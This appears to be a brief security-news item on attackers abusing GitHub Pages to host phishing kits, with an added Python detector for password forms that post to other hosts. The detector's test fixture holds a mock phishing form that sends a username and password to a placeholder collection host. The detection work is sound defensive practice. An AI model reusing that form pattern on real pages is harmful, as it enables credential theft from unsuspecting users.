What is the issue - Researchers observed that attackers have been abusing free code repositories on GitHub to host a variety of phishing websites on github.io domains.
Why it matters - These GitHub repositories have been abused by attackers to carry out a wide variety of malicious activities, including phishing campaigns.
The big picture
Researchers from Proofpoint observed that repositories on GitHub have been abused by attackers to carry out a phishing campaign, while some attackers use the github.io domains as traffic redirectors.
Researchers noted that the phishing kits do not use typical hosted PHP methods because the github.io platform does not provide PHP back-end services.
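A defender-side check that follows from the missing PHP back end, added here as an example and not taken from the Proofpoint research: it assumes a kit served from github.io has to submit its login form to some other host, and flags password forms whose action leaves the page's own host. The function names, sample pages and `collector.example` host are constructed for illustration, and a kit that sends credentials from script instead of a form action is outside what this check covers.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormAudit(HTMLParser):
    """Collects each <form> action and whether the form holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []       # list of [action, has_password]
        self._open = None     # form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = [a.get("action") or "", False]
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (a.get("type") or "").lower() == "password":
                self._open[1] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def offsite_credential_posts(page_url, html):
    """Return hosts that receive password forms from a github.io page."""
    page_host = (urlparse(page_url).hostname or "").lower()
    if not page_host.endswith(".github.io"):
        return []
    audit = FormAudit()
    audit.feed(html)
    hits = []
    for action, has_password in audit.forms:
        # An empty or relative action resolves to the page's own host.
        target = (urlparse(urljoin(page_url, action)).hostname or "").lower()
        if has_password and target and target != page_host:
            hits.append(target)
    return hits


# Constructed sample pages; hosts are placeholders, not indicators from the report.
SAMPLE_KIT = """<form method="post" action="https://collector.example/save.php">
<input type="text" name="user"><input type="PASSWORD" name="pass"></form>"""
SAMPLE_BENIGN = """<form action="/search"><input type="text" name="q"></form>"""

if __name__ == "__main__":
    print(offsite_credential_posts("https://brand-login.github.io/", SAMPLE_KIT))
    print(offsite_credential_posts("https://docs.github.io/", SAMPLE_BENIGN))
```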
“In contrast to private paid accounts, due to the nature of public GitHub accounts, we were able to observe when actors made changes to their hosted web pages. This visibility may help give insight to the nature of edits performed on phishing kits that were not written from scratch. As most kits are not written from scratch and are instead simply modified by different actors to suit their individual purposes, this level of visibility may be useful for defenders tracking actor behavior and attribution,” researchers wrote in a blog post.